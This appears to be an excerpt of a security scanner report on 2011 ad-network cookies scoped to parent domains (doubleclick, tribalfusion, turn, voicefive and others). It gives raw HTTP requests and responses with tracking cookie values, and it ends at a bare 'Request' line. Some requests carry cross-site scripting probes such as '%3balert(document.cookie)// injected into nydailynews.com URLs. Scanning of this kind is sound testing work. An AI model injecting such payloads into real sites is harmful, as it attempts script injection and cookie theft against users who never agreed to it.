ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=246673&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=3596418555825.9487? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20¢er=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/html; charset=utf-8 Content-Length: 1767 Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a9d/17/19e/*/x;234178444;1-0;0;58087481;3454-728/90;40401349/40419136/1;;~sscs=?http:/a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true Set-Cookie: id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:41:38 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];ord=1114886567?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.vw.com Set-Cookie: id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:40:24 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N6103.135388.BIZO/B5185769.6;sz=728x90;ord=7630304?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.supercutsfranchise.com Set-Cookie: id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 28 Jan 2011 16:40:37 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=6 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 28 Jan 2011 14:48:47 GMT Content-Length: 335
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d791689/21/39823749/decide.php?ord=1296226106 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:48:41 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b203.dl Set-Cookie: CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296224089.327,wait-%3E10000,&1296224142212 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_G=method->-1,ts->1296224088; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 14:14:50 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p85001580=exp=21&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:19:48 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296263988%2E989%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 29 Jan 2011 01:32:02 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 27557
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
